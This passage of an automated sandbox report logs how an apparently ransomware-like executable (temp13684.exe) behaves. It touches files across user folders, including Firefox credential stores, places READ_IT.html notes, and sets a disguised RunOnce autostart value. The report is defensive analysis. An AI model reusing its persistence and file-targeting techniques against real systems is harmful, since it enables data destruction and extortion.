Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Desktop\52bI-hhJ3zFu3m69\READ_IT.html	type = file_attributes	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Desktop\52bI-hhJ3zFu3m69\adbgirUxyBMJq0pOiu.avi	type = size, size_out = 88602	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Desktop\52bI-hhJ3zFu3m69\READ_IT.html	type = file_attributes	6	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Desktop\52bI-hhJ3zFu3m69\LopyK.flv	type = size, size_out = 26400	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Desktop\52bI-hhJ3zFu3m69\LX2vm0PVBOBNtWI6.gif	type = size, size_out = 72155	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Desktop\52bI-hhJ3zFu3m69\Mg9jqOZ12EhB4-HjFEm.gif	type = size, size_out = 86129	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Desktop\52bI-hhJ3zFu3m69\p_1CkonjrNXGCwkIn3j.rtf	type = size, size_out = 90841	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Desktop\52bI-hhJ3zFu3m69\RKQ9HZgpCj5.mp4	type = size, size_out = 29786	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Contacts\Aclviho ASldjfl.contact	type = size, size_out = 1178	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Contacts\READ_IT.html	type = file_attributes	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Contacts\Administrator.contact	type = size, size_out = 68382	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Contacts\READ_IT.html	type = file_attributes	6	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Contacts\asdlfk poopvy.contact	type = size, size_out = 1171	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Contacts\chucu jadnvk.contact	type = size, size_out = 1177	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Contacts\desktop.ini	type = size, size_out = 412	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Contacts\lulcit amkdfe.contact	type = size, size_out = 1174	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Contacts\sikvnb huvuib.contact	type = size, size_out = 1172	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\4 dKhm4.doc	type = size, size_out = 18308	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\READ_IT.html	type = file_attributes	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\5QQe5_.mkv	type = size, size_out = 25367	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\READ_IT.html	type = file_attributes	36	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\67_x5gea.ppt	type = size, size_out = 59570	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\7IQFQytHlLfaVT6G.m4a	type = size, size_out = 15600	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\7Rx_YFPI7G6.avi	type = size, size_out = 51060	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\92wAZIT1y.bmp	type = size, size_out = 49897	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\BcucTO-lsFxXF.swf	type = size, size_out = 88524	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\beN0t.png	type = size, size_out = 41991	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\BHMU64hzOdeWD -0.m4a	type = size, size_out = 46196	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\buTh4KTP4lymd-8Q.mkv	type = size, size_out = 71034	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\cgt di.pptx	type = size, size_out = 65172	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\CPqQ dVCpdsx.rtf	type = size, size_out = 46027	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\DhyiEQ4Xj.bmp	type = size, size_out = 34677	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\E1787L5.xlsx	type = size, size_out = 8525	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\EEfzaM7d2YAF.mkv	type = size, size_out = 60106	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\ezu8il U5Yn6C.m4a	type = size, size_out = 21646	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\fKtkyR 1-OP.mp4	type = size, size_out = 92182	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\i1LzIzrV0t.gif	type = size, size_out = 82360	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\jhB5.pdf	type = size, size_out = 71904	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\JT0 nHyxkAPSaoLmKv0R.flv	type = size, size_out = 67530	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\K28I44Cu.gif	type = size, size_out = 75099	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\K9OSgOmlj6mb.wav	type = size, size_out = 47667	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\ktjahCujmY.avi	type = size, size_out = 66206	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\kyIh4_jik6uQrR9hn.csv	type = size, size_out = 50852	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\MGacSuRE6 J9_.xlsx	type = size, size_out = 56790	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\mMlPxJAH5t3ZDP-AfXP.bmp	type = size, size_out = 87540	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\oFWyT_.jpg	type = size, size_out = 84864	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\QOQ-s.wav	type = size, size_out = 57148	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\tqQHus T.bmp	type = size, size_out = 68284	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\u-tFp_dSKAw4.swf	type = size, size_out = 92882	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\UbiKXV.mp4	type = size, size_out = 98840	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\ud83q.m4a	type = size, size_out = 65412	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\uTyOJB3M3.jpg	type = size, size_out = 42094	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\Vzxp5zim2Nc.mp3	type = size, size_out = 48965	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\Wgrgh-5PaoXJURuexKk.mkv	type = size, size_out = 24420	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\z8sSR5 Fp7wKkj1aRuZ.bmp	type = size, size_out = 89128	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\zEsTq08NWkN.ods	type = size, size_out = 25419	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\Mozilla\Firefox\profiles.ini	type = size, size_out = 111	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\Mozilla\Firefox\READ_IT.html	type = file_attributes	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\Mozilla\Firefox\Profiles\5cb79syl.default\addons.json	type = size, size_out = 24	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\Mozilla\Firefox\Profiles\5cb79syl.default\READ_IT.html	type = file_attributes	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\Mozilla\Firefox\Profiles\5cb79syl.default\cert8.db	type = size, size_out = 65536	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\Mozilla\Firefox\Profiles\5cb79syl.default\READ_IT.html	type = file_attributes	24	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\Mozilla\Firefox\Profiles\5cb79syl.default\compatibility.ini	type = size, size_out = 206	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\Mozilla\Firefox\Profiles\5cb79syl.default\content-prefs.sqlite	type = size, size_out = 229376	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\Mozilla\Firefox\Profiles\5cb79syl.default\cookies.sqlite	type = size, size_out = 524288	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\Mozilla\Firefox\Profiles\5cb79syl.default\downloads.sqlite	type = size, size_out = 98304	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\Mozilla\Firefox\Profiles\5cb79syl.default\extensions.ini	type = size, size_out = 141	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\Mozilla\Firefox\Profiles\5cb79syl.default\extensions.sqlite	type = size, size_out = 458752	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\Mozilla\Firefox\Profiles\5cb79syl.default\healthreport.sqlite	type = size, size_out = 1146880	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\Mozilla\Firefox\Profiles\5cb79syl.default\key3.db	type = size, size_out = 16384	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\Mozilla\Firefox\Profiles\5cb79syl.default\localstore.rdf	type = size, size_out = 1343	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\Mozilla\Firefox\Profiles\5cb79syl.default\marionette.log	type = size, size_out = 57	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\Mozilla\Firefox\Profiles\5cb79syl.default\mimeTypes.rdf	type = size, size_out = 3734	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\Mozilla\Firefox\Profiles\5cb79syl.default\parent.lock	type = size, size_out = 0	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\Mozilla\Firefox\Profiles\5cb79syl.default\permissions.sqlite	type = size, size_out = 65536	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\Mozilla\Firefox\Profiles\5cb79syl.default\places.sqlite	type = size, size_out = 10485760	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\Mozilla\Firefox\Profiles\5cb79syl.default\pluginreg.dat	type = size, size_out = 3604	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\Mozilla\Firefox\Profiles\5cb79syl.default\prefs.js	type = size, size_out = 4227	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\Mozilla\Firefox\Profiles\5cb79syl.default\search.json	type = size, size_out = 16771	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\Mozilla\Firefox\Profiles\5cb79syl.default\secmod.db	type = size, size_out = 16384	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\Mozilla\Firefox\Profiles\5cb79syl.default\sessionstore.bak	type = size, size_out = 890	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\Mozilla\Firefox\Profiles\5cb79syl.default\sessionstore.js	type = size, size_out = 133491	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\Mozilla\Firefox\Profiles\5cb79syl.default\signons.sqlite	type = size, size_out = 327680	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\Mozilla\Firefox\Profiles\5cb79syl.default\times.json	type = size, size_out = 29	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\Mozilla\Firefox\Profiles\5cb79syl.default\urlclassifierkey3.txt	type = size, size_out = 154	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\Mozilla\Firefox\Profiles\5cb79syl.default\webappsstore.sqlite	type = size, size_out = 98304	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\Mozilla\Firefox\Profiles\5cb79syl.default\webapps\webapps.json	type = size, size_out = 2	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\Mozilla\Firefox\Profiles\5cb79syl.default\webapps\READ_IT.html	type = file_attributes	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\Mozilla\Firefox\Profiles\5cb79syl.default\indexedDB\moz-safe-about+home\.metadata	type = size, size_out = 0	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\Mozilla\Firefox\Profiles\5cb79syl.default\indexedDB\moz-safe-about+home\idb\818200132aebmoouht.sqlite	type = size, size_out = 3112960	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\Mozilla\Firefox\Profiles\5cb79syl.default\indexedDB\moz-safe-about+home\idb\READ_IT.html	type = file_attributes	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\Mozilla\Firefox\Profiles\5cb79syl.default\bookmarkbackups\bookmarks-2017-06-23_5.json	type = size, size_out = 3035	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\Mozilla\Firefox\Profiles\5cb79syl.default\bookmarkbackups\READ_IT.html	type = file_attributes	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\Mozilla\Firefox\Crash Reports\InstallTime20131025151332	type = size, size_out = 10	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\Mozilla\Firefox\Crash Reports\READ_IT.html	type = file_attributes	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\settings.sol	type = size, size_out = 291	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\READ_IT.html	type = file_attributes	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\Adobe\Acrobat\10.0\Security\addressbook.acrodata	type = size, size_out = 5399	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\Adobe\Acrobat\10.0\Security\READ_IT.html	type = file_attributes	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\Adobe\Acrobat\10.0\Security\CRLCache\48B76449F3D5FEFA1133AA805E420F0FCA643651.crl	type = size, size_out = 933	1	Fn
For performance reasons, the remaining 1115 entries are omitted. The remaining entries can be found in glog.xml.

Registry (4)

Operation	Key	Additional Information	Count	Logfile
Create Key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce		1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce		1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce	value_name = CertificatesCheck, data = 0	1	Fn
Write Value	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce	value_name = CertificatesCheck, data = C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\Temp13684.exe, size = 118, type = REG_SZ	1	Fn

Module (77)

Operation	Module	Additional Information	Count	Logfile
Load	gqrapi.dll	base_address = 0x0	1	Fn
Load	regapi.dll	base_address = 0x74f70000	1	Fn
Load	ole32.dll	base_address = 0x75d50000	1	Fn
Get Handle	c:\windows\syswow64\kernel32.dll	base_address = 0x75eb0000	3	Fn
Get Handle	c:\windows\syswow64\user32.dll	base_address = 0x75880000	1	Fn
Get Handle	c:\windows\syswow64\advapi32.dll	base_address = 0x75b10000	1	Fn
Get Handle	ole32.dll	base_address = 0x0	1	Fn
Get Handle	c:\windows\syswow64\shlwapi.dll	base_address = 0x765b0000	1	Fn
Get Handle	c:\users\ybz8bt~1\appdata\local\temp13684.exe	base_address = 0x400000	1	Fn
Get Filename	ole32.dll	process_name = c:\users\ybz8bt~1\appdata\local\temp13684.exe, file_name_orig = C:\Users\YBZ8BT~1\AppData\Local\Temp13684.exe, size = 2048	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ReadProcessMemory, address_out = 0x75edcfcc	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualAlloc, address_out = 0x75ec1856	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapAlloc, address_out = 0x779be026	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapFree, address_out = 0x75ec14c9	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTickCount, address_out = 0x75ec110c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrlenA, address_out = 0x75ec5a4b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetFilePointerEx, address_out = 0x75edc807	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WriteFile, address_out = 0x75ec1282	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WideCharToMultiByte, address_out = 0x75ec170d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ReadFile, address_out = 0x75ec3ed3	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateFileW, address_out = 0x75ec3f5c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetFileSizeEx, address_out = 0x75ec59e2	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLastError, address_out = 0x75ec11c0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ExitProcess, address_out = 0x75ec7a10	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetEnvironmentVariableW, address_out = 0x75ec1b48	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTempFileNameW, address_out = 0x75eed1b6	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindFirstFileW, address_out = 0x75ec4435	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetFilePointer, address_out = 0x75ec17d1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcpynA, address_out = 0x75ed192a	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateProcessW, address_out = 0x75ec103d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = MoveFileExW, address_out = 0x75ed9b2d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLogicalDrives, address_out = 0x75ec5371	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcpyA, address_out = 0x75ee2a9d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetDriveTypeA, address_out = 0x75edef75	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = Sleep, address_out = 0x75ec10ff	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CopyFileW, address_out = 0x75ee830d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetFileAttributesW, address_out = 0x75ec1b18	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleFileNameW, address_out = 0x75ec4950	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = MultiByteToWideChar, address_out = 0x75ec192e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetStdHandle, address_out = 0x75ec51b3	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcmpiA, address_out = 0x75ec3e8e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindClose, address_out = 0x75ec4442	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcmpiW, address_out = 0x75edd5cd	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcatW, address_out = 0x75ee828e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindNextFileW, address_out = 0x75ec54ee	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CompareStringA, address_out = 0x75ec3c5a	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcpyW, address_out = 0x75ee3102	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetFileAttributesW, address_out = 0x75edd4f7	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CloseHandle, address_out = 0x75ec1410	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateToolhelp32Snapshot, address_out = 0x75ee735f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = Process32NextW, address_out = 0x75ee896c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = Process32FirstW, address_out = 0x75ee8baf	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrlenW, address_out = 0x75ec1700	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcatA, address_out = 0x75ee2b7a	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateProcessA, address_out = 0x75ec1072	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapCreate, address_out = 0x75ec4a2d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetProcessHeap, address_out = 0x75ec14e9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCommandLineA, address_out = 0x75ec51a1	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = wsprintfA, address_out = 0x758aae5f	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegCloseKey, address_out = 0x75b2469d	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = GetCurrentHwProfileW, address_out = 0x75b11a03	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegOpenKeyExW, address_out = 0x75b2468d	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegQueryValueExW, address_out = 0x75b246ad	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegCreateKeyExW, address_out = 0x75b240fe	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptGenRandom, address_out = 0x75b1dfc8	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptReleaseContext, address_out = 0x75b1e124	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptAcquireContextW, address_out = 0x75b1df14	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegSetValueExW, address_out = 0x75b214d6	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CoCreateGuid, address_out = 0x75d915d5	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = StringFromGUID2, address_out = 0x75d922ec	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathRemoveFileSpecW, address_out = 0x765c3248	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = StrStrA, address_out = 0x765dc45b	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathFindFileNameW, address_out = 0x765cbb71	1	Fn

Environment (3)

Operation	Additional Information	Count	Logfile
Get Environment String	name = temp, result_out = C:\Users\YBZ8BT~1\AppData\Local\Temp	1	Fn
Get Environment String	name = appdata, result_out = C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming	1	Fn
Get Environment String	name = public, result_out = C:\Users\Public	1	Fn

Process #4: temp13684.exe

(Host: 41169, Network: 0)

Information	Value
ID	#4
File Name	c:\users\ybz8btyyvts 7lfsqb0g\appdata\roaming\temp13684.exe
Command Line	"C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\Temp13684.exe"
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:03:24, Reason: Autostart
Unmonitor	End Time: 00:15:23, Reason: Terminated by Timeout
Monitor Duration	00:11:59

OS Process Information

Information	Value
PID	0x670
Parent PID	0x568 (c:\windows\explorer.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	6CURNMAPTGWD\YbZ8BTYYvts 7lFSQB0g
Groups	6CURNMAPTGWD\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) BUILTIN\Administrators (USE_FOR_DENY_ONLY) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:0000f30f (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x 674 0x 320

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000030000	0x00030000	0x00031fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000030000	0x00030000	0x00030fff	Private Memory	Readable, Writable	Region Actions Download Dump
apisetschema.dll	0x00040000	0x00040fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x0000000000050000	0x00050000	0x0008ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000090000	0x00090000	0x0018ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000190000	0x00190000	0x00193fff	Pagefile Backed Memory	Readable	Region Actions
locale.nls	0x001a0000	0x00206fff	Memory Mapped File	Readable	Region Actions
private_0x0000000000210000	0x00210000	0x00210fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000220000	0x00220000	0x00220fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000230000	0x00230000	0x00240fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000250000	0x00250000	0x0025ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000260000	0x00260000	0x0026ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000260000	0x00260000	0x00263fff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000000270000	0x00270000	0x00273fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000000290000	0x00290000	0x0029ffff	Private Memory	Readable, Writable	Region Actions Download Dump
rsaenh.dll	0x002a0000	0x002dbfff	Memory Mapped File	Readable	Region Actions
rsaenh.dll	0x002a0000	0x002dbfff	Memory Mapped File	Readable	Region Actions
private_0x00000000002a0000	0x002a0000	0x002dffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000340000	0x00340000	0x003bffff	Private Memory	Readable, Writable	Region Actions Download Dump
temp13684.exe	0x00400000	0x00435fff	Memory Mapped File	Readable, Writable, Executable	Region Actions Download Dump
pagefile_0x0000000000440000	0x00440000	0x005c7fff	Pagefile Backed Memory	Readable	Region Actions
private_0x00000000005e0000	0x005e0000	0x006dffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x00000000006e0000	0x006e0000	0x00860fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000870000	0x00870000	0x01c6ffff	Pagefile Backed Memory	Readable	Region Actions
sortdefault.nls	0x01c70000	0x01f3efff	Memory Mapped File	Readable	Region Actions
private_0x0000000002020000	0x02020000	0x0202ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000002030000	0x02030000	0x0212ffff	Private Memory	Readable, Writable	Region Actions Download Dump
